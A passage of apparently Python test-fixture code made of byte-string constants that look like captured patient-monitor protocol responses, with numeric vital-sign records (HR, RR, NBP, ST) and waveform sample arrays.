b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ 
b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_9_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ 
b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ 
b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_9_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\xaf\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_9_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x80\x80\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xd9\x1f\xd8\x1f\xd8\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4" \ b"\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3" \ b"\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde" \ b"\x1f\xdf\x1f\xe0\x1f\xe2\x1f\xe3\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8" \ b"\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2" \ b"\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc" \ b"\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xf5\x1f\xf6\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6\x1f\xf6\x1f\xf6\x1f\xf7\x1f\xf5" \ b"\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf9\x1f\xfa\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfe" \ b"\x1f\xff\x20\x00\x1f\xff\x1f\xff\x20\x00\x20\x00\x1f\xff\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x3d\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x49\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ 
b"\x1f\xca\x20\x92\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x9e\x21\xbe" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xe3\x1f\xe1\x1f\xe3" \ b"\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9" \ b"\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xdd\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf" \ b"\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe5\x1f\xe5\x1f\xe7\x1f\xe9" \ b"\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xed\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf7" \ b"\x1f\xf7\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb" \ b"\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66" \ b"\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91" \ b"\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05" \ b"\x04\x01\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_9_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x88\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_9_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ 
b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x90\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 